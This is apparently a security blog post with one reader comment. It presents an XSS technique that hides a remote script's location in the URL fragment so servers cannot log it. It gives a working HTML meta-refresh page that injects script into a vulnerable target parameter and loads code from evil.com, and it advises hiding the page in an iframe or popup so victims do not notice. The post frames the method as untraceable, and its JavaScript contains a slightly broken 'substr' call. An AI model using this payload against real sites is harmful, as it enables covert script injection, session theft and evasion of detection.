Now this got me thinking; the client can still read the portion of the URL after the # symbol.
So why not put the location of our logic after the URL fragment like so:
<html>
<head>
<meta http-equiv="refresh" content="0;http://www.target.com/page.php?vuln=<script>var source_loc = substr (document.location.lastIndexOf("#") + 1); var s = document.createElement ('script'); s.src=source_loc; document.body.appendChild(s);</script>#http://www.evil.com/s.js">
</head>
</html>
And then you just shove that in a iframe, or popup or whatever other technique you are using to make sure users don't notice they're being attacked, and you're done.
Looking at the actual exploit, you can see that what we end up doing is using a Reflected XSS hole to create a DOM Based XSS hole which is specifically untraceable.
And it seems like a much cleaner method than the last two posts to me.
1 comment:
Very nice. Super simple way to make XSS harder to detect server-side. Of course, if the server wanted to, it could just serve up some javascript in the header (assuming the XSS wasn't above the detection code) that detected the contents of the url as well and phoned home with it. Seems unlikely that websites would do that though given that it makes a lot more traffic for very little gain.
Post a Comment